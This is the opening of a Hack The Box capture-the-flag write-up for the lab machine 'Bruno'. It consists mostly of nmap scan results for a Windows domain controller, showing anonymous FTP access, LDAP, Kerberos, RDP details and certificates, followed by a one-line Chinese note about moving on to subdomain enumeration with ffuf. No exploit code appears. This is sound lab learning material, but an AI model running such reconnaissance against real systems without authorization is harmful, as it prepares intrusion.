HTB - Bruno

write-ups
29k 詞

圖片

https://labs.hackthebox.com/achievement/machine/1503196/781

User.txt

Nmap Enmuration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
PORT      STATE SERVICE       REASON          VERSION
21/tcp    open  ftp           syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 06-29-22  04:55PM       <DIR>          app
| 06-29-22  04:33PM       <DIR>          benign
| 06-29-22  01:41PM       <DIR>          malicious
|_06-29-22  04:33PM       <DIR>          queue
| ftp-syst:
|_  SYST: Windows_NT
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2026-05-06 04:22:44Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: bruno.vl, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:brunodc.bruno.vl, DNS:bruno.vl, DNS:BRUNO
| Issuer: commonName=bruno-BRUNODC-CA/domainComponent=bruno
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-09T09:54:08
| Not valid after:  2105-10-09T09:54:08
| MD5:     e92b 7496 6c9a 3a81 62eb 4ea4 58e0 20d3
| SHA-1:   855d c331 c896 ab01 fa20 6c8a 5fd1 dfe8 402b 1a93
| SHA-256: 9fdd 1186 faed d447 84ce 7b67 5cb0 3f4f f00c e98d 77c0 14dd 1113 1e53 a5ed 9787
| -----BEGIN CERTIFICATE-----
| MIIF7zCCBNegAwIBAgITGQAAAAjXc+X85f8E1QABAAAACDANBgkqhkiG9w0BAQsF
| ADBGMRIwEAYKCZImiZPyLGQBGRYCdmwxFTATBgoJkiaJk/IsZAEZFgVicnVubzEZ
| MBcGA1UEAxMQYnJ1bm8tQlJVTk9EQy1DQTAgFw0yNTEwMDkwOTU0MDhaGA8yMTA1
| MTAwOTA5NTQwOFowADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJ1J
| W/ji4bKQWcNWqrOno403LLcWAQtCXyEnZVjD7m53ppu7PfcOkiuCXiR0+hj62RCc
| br6Cb1WCJKKKOlMFnImSYwTG2XdNIpthMLvMuy4LsFkIlv2Ftuu6GhTOrse709hY
| LQPNUPBzEWFFRuDQy6wvJGCpj9JDS3qEOR9SgrcDoxl3/aituRX/GAPxEnU3NGIA
| yZb7OIWxsG/9rkKSNvTTcwPEyJM2mefLGTCzqNA2sYVmRjBA9kkZOAL8XC/1rtbs
| iQifkCzwx/GFtik0p5xdtfMlRqSX16ZhZFCLiX74lGthzzLwJDySaLncaTMRqT1Q
| NvDSJV9acUGJVPSCx+kCAwEAAaOCAxgwggMUMDcGCSsGAQQBgjcVBwQqMCgGICsG
| AQQBgjcVCIbn3TOCwLdjg42TEIfHx3qEpIl+WwEhAgFuAgEAMDIGA1UdJQQrMCkG
| CCsGAQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNVHQ8B
| Af8EBAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEFBQcD
| ATAMBgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFCrVERg1kqlkQIZi
| iAkfa/bOj8oCMB8GA1UdIwQYMBaAFK1guFdnT5oxV5Z6clsj9JK6o0vrMIHOBgNV
| HR8EgcYwgcMwgcCggb2ggbqGgbdsZGFwOi8vL0NOPWJydW5vLUJSVU5PREMtQ0Eo
| MSksQ049YnJ1bm9kYyxDTj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMs
| Q049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1icnVubyxEQz12bD9jZXJ0
| aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJp
| YnV0aW9uUG9pbnQwgb8GCCsGAQUFBwEBBIGyMIGvMIGsBggrBgEFBQcwAoaBn2xk
| YXA6Ly8vQ049YnJ1bm8tQlJVTk9EQy1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5
| JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1icnVu
| byxEQz12bD9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNh
| dGlvbkF1dGhvcml0eTAvBgNVHREBAf8EJTAjghBicnVub2RjLmJydW5vLnZsgghi
| cnVuby52bIIFQlJVTk8wTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEEAYI3GQIBoDAE
| LlMtMS01LTIxLTE1MzYzNzU5NDQtNDI4NjQxODM2Ni0zNDQ3Mjc4MTM3LTEwMDAw
| DQYJKoZIhvcNAQELBQADggEBAA2bsenNTOyPUQIN3j1sCnXL74xMyDt8/Pq/uck+
| q3dQSERyLFQxgwKuPXYtPMfgmOiIj6PWECbde4D3Ikw5WIyD+XQwMRzbg/z2ct6V
| 59/WCLXetGd34KpUqcksjtO0/RLGI5aBU+KK9EWBRi/FFB23CPY+MgkCEFYQBIEm
| PGRHr/RtSAoWMklpPWcj7dkdLSXVyUnL35YY5pEANvFDsROQ52BbH4BT+jIwjxF0
| c8zuVsi4N8XUTcR9r2dNZHB6CRqFvM+6rVNUar90Qi4OUsZR7oYzKf5loPXUdyyI
| lcZ21Xw4Q5V1vGn2qB6Z6kLjmUSLAT3qFYRrx5+HYhznweU=
|_-----END CERTIFICATE-----
|_ssl-date: 2026-05-06T04:24:13+00:00; +1s from scanner time.
443/tcp   open  ssl/https?    syn-ack ttl 127
| ssl-cert: Subject: commonName=bruno-BRUNODC-CA/domainComponent=bruno
| Issuer: commonName=bruno-BRUNODC-CA/domainComponent=bruno
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-06-29T13:23:01
| Not valid after:  2121-06-29T13:33:00
| MD5:     659b 3c90 00eb 1e0a 5170 1be9 0456 840c
| SHA-1:   a093 f4c2 3c8e 0532 86f2 1e99 cad7 82f8 e40e 3d72
| SHA-256: 427d 451e b031 5365 7c58 b5e6 3f16 c7c9 4a1e 788e e86e be01 4442 2949 1754 f63b
| -----BEGIN CERTIFICATE-----
| MIIDaTCCAlGgAwIBAgIQUtEbK1zCdqVN5bd/XhJejTANBgkqhkiG9w0BAQsFADBG
| MRIwEAYKCZImiZPyLGQBGRYCdmwxFTATBgoJkiaJk/IsZAEZFgVicnVubzEZMBcG
| A1UEAxMQYnJ1bm8tQlJVTk9EQy1DQTAgFw0yMjA2MjkxMzIzMDFaGA8yMTIxMDYy
| OTEzMzMwMFowRjESMBAGCgmSJomT8ixkARkWAnZsMRUwEwYKCZImiZPyLGQBGRYF
| YnJ1bm8xGTAXBgNVBAMTEGJydW5vLUJSVU5PREMtQ0EwggEiMA0GCSqGSIb3DQEB
| AQUAA4IBDwAwggEKAoIBAQCrd/LZo4VhJnmSCReqrtb6gD4NAIRLeoyJYgau6h4O
| cF3sGNSNm210YKZErRp2k9dgKNNey9eJ263yth9hY40D0RUg90ridTUfucWwic4n
| LrV3Ud+I4IrRiSIpAjURuj6yNNm12hNhGc+V9fFr/8F6qk2mVCAey1YQtQC9Hy8n
| lDozddvnKJM301cktgpq+hvTKAD4wT89nvgxV8TQBguMmYj2JgilHcNiVHjEJVM4
| zmwuxWEAl6Imy3rsqjtadmNVqTcQ1uh6sjJFC1mcjG4LHTtyQJziyvM8gt0ftXEG
| bSHvSuwK5m7+0LqimoyXkuBj3L4BE0Zxi1veTVG9BXKlAgMBAAGjUTBPMAsGA1Ud
| DwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQWBBRymma+nX59JCIuEqzy
| XpY1Kq6t6DAQBgkrBgEEAYI3FQEEAwIBADANBgkqhkiG9w0BAQsFAAOCAQEAk+Gd
| sTRy/LmduD1KEfb69YUzAxID4AL4kyKZUMxdP2Y5KEcQOpujW23ctG2iRrPCNAZW
| K4sfZj5rLrGCUdzCRpl7dU+ag1tgyYtQz6mtx7r8ojQvFa3ehvzgH5Kuubnx8YJf
| UN0rgD4bHf2vEub2/7ZK2uRN+xdYuYKW5JDLXpYUOi2YgzpjHuPTqJ8rFYpDsiPb
| kms6eaHUgsGde6mf3fzYXrzN2T9jp3DVnQ9a+cG6t58X/QzhLByO9q4RkI8doqcS
| OWEA5QD0ALJL2yHL31M6VwqYiO0vkpwc1DiRP+MVUX/YgsIWFA2ygf93loF/3hqP
| wc7DM/NxbJM1GJzG4Q==
|_-----END CERTIFICATE-----
| tls-alpn:
|   h2
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: bruno.vl, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:brunodc.bruno.vl, DNS:bruno.vl, DNS:BRUNO
| Issuer: commonName=bruno-BRUNODC-CA/domainComponent=bruno
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-09T09:54:08
| Not valid after:  2105-10-09T09:54:08
| MD5:     e92b 7496 6c9a 3a81 62eb 4ea4 58e0 20d3
| SHA-1:   855d c331 c896 ab01 fa20 6c8a 5fd1 dfe8 402b 1a93
| SHA-256: 9fdd 1186 faed d447 84ce 7b67 5cb0 3f4f f00c e98d 77c0 14dd 1113 1e53 a5ed 9787
| -----BEGIN CERTIFICATE-----
| MIIF7zCCBNegAwIBAgITGQAAAAjXc+X85f8E1QABAAAACDANBgkqhkiG9w0BAQsF
| ADBGMRIwEAYKCZImiZPyLGQBGRYCdmwxFTATBgoJkiaJk/IsZAEZFgVicnVubzEZ
| MBcGA1UEAxMQYnJ1bm8tQlJVTk9EQy1DQTAgFw0yNTEwMDkwOTU0MDhaGA8yMTA1
| MTAwOTA5NTQwOFowADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJ1J
| W/ji4bKQWcNWqrOno403LLcWAQtCXyEnZVjD7m53ppu7PfcOkiuCXiR0+hj62RCc
| br6Cb1WCJKKKOlMFnImSYwTG2XdNIpthMLvMuy4LsFkIlv2Ftuu6GhTOrse709hY
| LQPNUPBzEWFFRuDQy6wvJGCpj9JDS3qEOR9SgrcDoxl3/aituRX/GAPxEnU3NGIA
| yZb7OIWxsG/9rkKSNvTTcwPEyJM2mefLGTCzqNA2sYVmRjBA9kkZOAL8XC/1rtbs
| iQifkCzwx/GFtik0p5xdtfMlRqSX16ZhZFCLiX74lGthzzLwJDySaLncaTMRqT1Q
| NvDSJV9acUGJVPSCx+kCAwEAAaOCAxgwggMUMDcGCSsGAQQBgjcVBwQqMCgGICsG
| AQQBgjcVCIbn3TOCwLdjg42TEIfHx3qEpIl+WwEhAgFuAgEAMDIGA1UdJQQrMCkG
| CCsGAQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNVHQ8B
| Af8EBAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEFBQcD
| ATAMBgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFCrVERg1kqlkQIZi
| iAkfa/bOj8oCMB8GA1UdIwQYMBaAFK1guFdnT5oxV5Z6clsj9JK6o0vrMIHOBgNV
| HR8EgcYwgcMwgcCggb2ggbqGgbdsZGFwOi8vL0NOPWJydW5vLUJSVU5PREMtQ0Eo
| MSksQ049YnJ1bm9kYyxDTj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMs
| Q049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1icnVubyxEQz12bD9jZXJ0
| aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJp
| YnV0aW9uUG9pbnQwgb8GCCsGAQUFBwEBBIGyMIGvMIGsBggrBgEFBQcwAoaBn2xk
| YXA6Ly8vQ049YnJ1bm8tQlJVTk9EQy1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5
| JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1icnVu
| byxEQz12bD9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNh
| dGlvbkF1dGhvcml0eTAvBgNVHREBAf8EJTAjghBicnVub2RjLmJydW5vLnZsgghi
| cnVuby52bIIFQlJVTk8wTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEEAYI3GQIBoDAE
| LlMtMS01LTIxLTE1MzYzNzU5NDQtNDI4NjQxODM2Ni0zNDQ3Mjc4MTM3LTEwMDAw
| DQYJKoZIhvcNAQELBQADggEBAA2bsenNTOyPUQIN3j1sCnXL74xMyDt8/Pq/uck+
| q3dQSERyLFQxgwKuPXYtPMfgmOiIj6PWECbde4D3Ikw5WIyD+XQwMRzbg/z2ct6V
| 59/WCLXetGd34KpUqcksjtO0/RLGI5aBU+KK9EWBRi/FFB23CPY+MgkCEFYQBIEm
| PGRHr/RtSAoWMklpPWcj7dkdLSXVyUnL35YY5pEANvFDsROQ52BbH4BT+jIwjxF0
| c8zuVsi4N8XUTcR9r2dNZHB6CRqFvM+6rVNUar90Qi4OUsZR7oYzKf5loPXUdyyI
| lcZ21Xw4Q5V1vGn2qB6Z6kLjmUSLAT3qFYRrx5+HYhznweU=
|_-----END CERTIFICATE-----
|_ssl-date: 2026-05-06T04:24:13+00:00; +1s from scanner time.
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: bruno.vl, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:brunodc.bruno.vl, DNS:bruno.vl, DNS:BRUNO
| Issuer: commonName=bruno-BRUNODC-CA/domainComponent=bruno
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-09T09:54:08
| Not valid after:  2105-10-09T09:54:08
| MD5:     e92b 7496 6c9a 3a81 62eb 4ea4 58e0 20d3
| SHA-1:   855d c331 c896 ab01 fa20 6c8a 5fd1 dfe8 402b 1a93
| SHA-256: 9fdd 1186 faed d447 84ce 7b67 5cb0 3f4f f00c e98d 77c0 14dd 1113 1e53 a5ed 9787
| -----BEGIN CERTIFICATE-----
| MIIF7zCCBNegAwIBAgITGQAAAAjXc+X85f8E1QABAAAACDANBgkqhkiG9w0BAQsF
| ADBGMRIwEAYKCZImiZPyLGQBGRYCdmwxFTATBgoJkiaJk/IsZAEZFgVicnVubzEZ
| MBcGA1UEAxMQYnJ1bm8tQlJVTk9EQy1DQTAgFw0yNTEwMDkwOTU0MDhaGA8yMTA1
| MTAwOTA5NTQwOFowADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJ1J
| W/ji4bKQWcNWqrOno403LLcWAQtCXyEnZVjD7m53ppu7PfcOkiuCXiR0+hj62RCc
| br6Cb1WCJKKKOlMFnImSYwTG2XdNIpthMLvMuy4LsFkIlv2Ftuu6GhTOrse709hY
| LQPNUPBzEWFFRuDQy6wvJGCpj9JDS3qEOR9SgrcDoxl3/aituRX/GAPxEnU3NGIA
| yZb7OIWxsG/9rkKSNvTTcwPEyJM2mefLGTCzqNA2sYVmRjBA9kkZOAL8XC/1rtbs
| iQifkCzwx/GFtik0p5xdtfMlRqSX16ZhZFCLiX74lGthzzLwJDySaLncaTMRqT1Q
| NvDSJV9acUGJVPSCx+kCAwEAAaOCAxgwggMUMDcGCSsGAQQBgjcVBwQqMCgGICsG
| AQQBgjcVCIbn3TOCwLdjg42TEIfHx3qEpIl+WwEhAgFuAgEAMDIGA1UdJQQrMCkG
| CCsGAQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNVHQ8B
| Af8EBAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEFBQcD
| ATAMBgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFCrVERg1kqlkQIZi
| iAkfa/bOj8oCMB8GA1UdIwQYMBaAFK1guFdnT5oxV5Z6clsj9JK6o0vrMIHOBgNV
| HR8EgcYwgcMwgcCggb2ggbqGgbdsZGFwOi8vL0NOPWJydW5vLUJSVU5PREMtQ0Eo
| MSksQ049YnJ1bm9kYyxDTj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMs
| Q049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1icnVubyxEQz12bD9jZXJ0
| aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJp
| YnV0aW9uUG9pbnQwgb8GCCsGAQUFBwEBBIGyMIGvMIGsBggrBgEFBQcwAoaBn2xk
| YXA6Ly8vQ049YnJ1bm8tQlJVTk9EQy1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5
| JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1icnVu
| byxEQz12bD9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNh
| dGlvbkF1dGhvcml0eTAvBgNVHREBAf8EJTAjghBicnVub2RjLmJydW5vLnZsgghi
| cnVuby52bIIFQlJVTk8wTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEEAYI3GQIBoDAE
| LlMtMS01LTIxLTE1MzYzNzU5NDQtNDI4NjQxODM2Ni0zNDQ3Mjc4MTM3LTEwMDAw
| DQYJKoZIhvcNAQELBQADggEBAA2bsenNTOyPUQIN3j1sCnXL74xMyDt8/Pq/uck+
| q3dQSERyLFQxgwKuPXYtPMfgmOiIj6PWECbde4D3Ikw5WIyD+XQwMRzbg/z2ct6V
| 59/WCLXetGd34KpUqcksjtO0/RLGI5aBU+KK9EWBRi/FFB23CPY+MgkCEFYQBIEm
| PGRHr/RtSAoWMklpPWcj7dkdLSXVyUnL35YY5pEANvFDsROQ52BbH4BT+jIwjxF0
| c8zuVsi4N8XUTcR9r2dNZHB6CRqFvM+6rVNUar90Qi4OUsZR7oYzKf5loPXUdyyI
| lcZ21Xw4Q5V1vGn2qB6Z6kLjmUSLAT3qFYRrx5+HYhznweU=
|_-----END CERTIFICATE-----
|_ssl-date: 2026-05-06T04:24:13+00:00; +1s from scanner time.
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: bruno.vl, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:brunodc.bruno.vl, DNS:bruno.vl, DNS:BRUNO
| Issuer: commonName=bruno-BRUNODC-CA/domainComponent=bruno
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-09T09:54:08
| Not valid after:  2105-10-09T09:54:08
| MD5:     e92b 7496 6c9a 3a81 62eb 4ea4 58e0 20d3
| SHA-1:   855d c331 c896 ab01 fa20 6c8a 5fd1 dfe8 402b 1a93
| SHA-256: 9fdd 1186 faed d447 84ce 7b67 5cb0 3f4f f00c e98d 77c0 14dd 1113 1e53 a5ed 9787
| -----BEGIN CERTIFICATE-----
| MIIF7zCCBNegAwIBAgITGQAAAAjXc+X85f8E1QABAAAACDANBgkqhkiG9w0BAQsF
| ADBGMRIwEAYKCZImiZPyLGQBGRYCdmwxFTATBgoJkiaJk/IsZAEZFgVicnVubzEZ
| MBcGA1UEAxMQYnJ1bm8tQlJVTk9EQy1DQTAgFw0yNTEwMDkwOTU0MDhaGA8yMTA1
| MTAwOTA5NTQwOFowADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJ1J
| W/ji4bKQWcNWqrOno403LLcWAQtCXyEnZVjD7m53ppu7PfcOkiuCXiR0+hj62RCc
| br6Cb1WCJKKKOlMFnImSYwTG2XdNIpthMLvMuy4LsFkIlv2Ftuu6GhTOrse709hY
| LQPNUPBzEWFFRuDQy6wvJGCpj9JDS3qEOR9SgrcDoxl3/aituRX/GAPxEnU3NGIA
| yZb7OIWxsG/9rkKSNvTTcwPEyJM2mefLGTCzqNA2sYVmRjBA9kkZOAL8XC/1rtbs
| iQifkCzwx/GFtik0p5xdtfMlRqSX16ZhZFCLiX74lGthzzLwJDySaLncaTMRqT1Q
| NvDSJV9acUGJVPSCx+kCAwEAAaOCAxgwggMUMDcGCSsGAQQBgjcVBwQqMCgGICsG
| AQQBgjcVCIbn3TOCwLdjg42TEIfHx3qEpIl+WwEhAgFuAgEAMDIGA1UdJQQrMCkG
| CCsGAQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNVHQ8B
| Af8EBAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEFBQcD
| ATAMBgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFCrVERg1kqlkQIZi
| iAkfa/bOj8oCMB8GA1UdIwQYMBaAFK1guFdnT5oxV5Z6clsj9JK6o0vrMIHOBgNV
| HR8EgcYwgcMwgcCggb2ggbqGgbdsZGFwOi8vL0NOPWJydW5vLUJSVU5PREMtQ0Eo
| MSksQ049YnJ1bm9kYyxDTj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMs
| Q049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1icnVubyxEQz12bD9jZXJ0
| aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJp
| YnV0aW9uUG9pbnQwgb8GCCsGAQUFBwEBBIGyMIGvMIGsBggrBgEFBQcwAoaBn2xk
| YXA6Ly8vQ049YnJ1bm8tQlJVTk9EQy1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5
| JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1icnVu
| byxEQz12bD9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNh
| dGlvbkF1dGhvcml0eTAvBgNVHREBAf8EJTAjghBicnVub2RjLmJydW5vLnZsgghi
| cnVuby52bIIFQlJVTk8wTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEEAYI3GQIBoDAE
| LlMtMS01LTIxLTE1MzYzNzU5NDQtNDI4NjQxODM2Ni0zNDQ3Mjc4MTM3LTEwMDAw
| DQYJKoZIhvcNAQELBQADggEBAA2bsenNTOyPUQIN3j1sCnXL74xMyDt8/Pq/uck+
| q3dQSERyLFQxgwKuPXYtPMfgmOiIj6PWECbde4D3Ikw5WIyD+XQwMRzbg/z2ct6V
| 59/WCLXetGd34KpUqcksjtO0/RLGI5aBU+KK9EWBRi/FFB23CPY+MgkCEFYQBIEm
| PGRHr/RtSAoWMklpPWcj7dkdLSXVyUnL35YY5pEANvFDsROQ52BbH4BT+jIwjxF0
| c8zuVsi4N8XUTcR9r2dNZHB6CRqFvM+6rVNUar90Qi4OUsZR7oYzKf5loPXUdyyI
| lcZ21Xw4Q5V1vGn2qB6Z6kLjmUSLAT3qFYRrx5+HYhznweU=
|_-----END CERTIFICATE-----
|_ssl-date: 2026-05-06T04:24:13+00:00; +1s from scanner time.
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=brunodc.bruno.vl
| Issuer: commonName=brunodc.bruno.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-05-05T04:19:16
| Not valid after:  2026-11-04T04:19:16
| MD5:     128d 1721 d9c7 6e11 6ed6 8695 cd13 3d26
| SHA-1:   bc9d 5820 ea07 b78c 8318 d706 ccd5 12ee 6f16 01cf
| SHA-256: 3f65 fd9c f5ae 1e3a 0963 faf3 c18b eedd 35ae 04d5 b54b 532c 61d5 1535 492f 8b78
| -----BEGIN CERTIFICATE-----
| MIIC5DCCAcygAwIBAgIQZW8PIg+Ns5BIZMqVKmaqwzANBgkqhkiG9w0BAQsFADAb
| MRkwFwYDVQQDExBicnVub2RjLmJydW5vLnZsMB4XDTI2MDUwNTA0MTkxNloXDTI2
| MTEwNDA0MTkxNlowGzEZMBcGA1UEAxMQYnJ1bm9kYy5icnVuby52bDCCASIwDQYJ
| KoZIhvcNAQEBBQADggEPADCCAQoCggEBALS8pfB9XjARYg9mAtzQJ3fIbe/8YhGC
| hDihRB0OlfPjRz2HhmfzirYM+vwH2PQu/ZL8/s0rXOkSY/h1FO8vv8CLEatf0kbj
| M1YprfN6FITMC/57HLn5JnBRB5E4O03OBL9A3ZyiudJ4LQElW2EOFoeZxFcdevjo
| WjY4B1jYR8CUoXff3BmViW/lfbP0U3UhHvRVWgV/9bOMUdWVPsh1GtVkHbwjCbHw
| fCPe5uISipN5YABArBspR/+OqrLmOxc/ah8oRL/q6TxyR3PtgVN/ZSKaXMMxNt/I
| hJa+zZjGidLVqFtcFFUFpz/MtH8Vqc6cqpznkjDhZBiJtW9m6Jyfa2UCAwEAAaMk
| MCIwEwYDVR0lBAwwCgYIKwYBBQUHAwEwCwYDVR0PBAQDAgQwMA0GCSqGSIb3DQEB
| CwUAA4IBAQCdtx0x0ch42RfXwajcgZ0iAn6NBeBrnJZXN936PCXV1QG9LIIlueuH
| Hj7A7PdinxtgqvClxtfCnZPZV4dUI3szYJOBmmABkdKC/Mmxo37WAy/MkBkZY2tD
| 86AOjZISiryc0K8HT3Y5x+CHr2RDWT9bvOpuRAB2npUw8LsEqRy3IzqmQseNHgxL
| 4wd4nkYW6QZ+cEo1uXKa5P5BWWIkO+opAPmLOfNkDpHvaA6oKsFCDCYcjyopZGPZ
| XyTwdypaQvKL9zitNgvh9Tz84PxjRP0UPsGW9JOrQ2I92RPFE5+1TR3SDICvjYrT
| JRGXPRrzSZSW7liTuy2voc3tNoPfI+EQ
|_-----END CERTIFICATE-----
| rdp-ntlm-info:
|   Target_Name: BRUNO
|   NetBIOS_Domain_Name: BRUNO
|   NetBIOS_Computer_Name: BRUNODC
|   DNS_Domain_Name: bruno.vl
|   DNS_Computer_Name: brunodc.bruno.vl
|   DNS_Tree_Name: bruno.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2026-05-06T04:23:34+00:00
|_ssl-date: 2026-05-06T04:24:13+00:00; +1s from scanner time.
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
64002/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
64003/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
64070/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
64083/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: BRUNODC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2026-05-06T04:23:34
|_  start_date: N/A
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 26150/tcp): CLEAN (Timeout)
|   Check 2 (port 11545/tcp): CLEAN (Timeout)
|   Check 3 (port 33673/udp): CLEAN (Timeout)
|   Check 4 (port 41179/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 0s, deviation: 0s, median: 0s

Port 80

直接查看網頁 Port 80 毫無收穫接下來使用 ffuf 枚舉一下子域名

{FD73CF32-23F2-4493-8833-08CEFF328203}

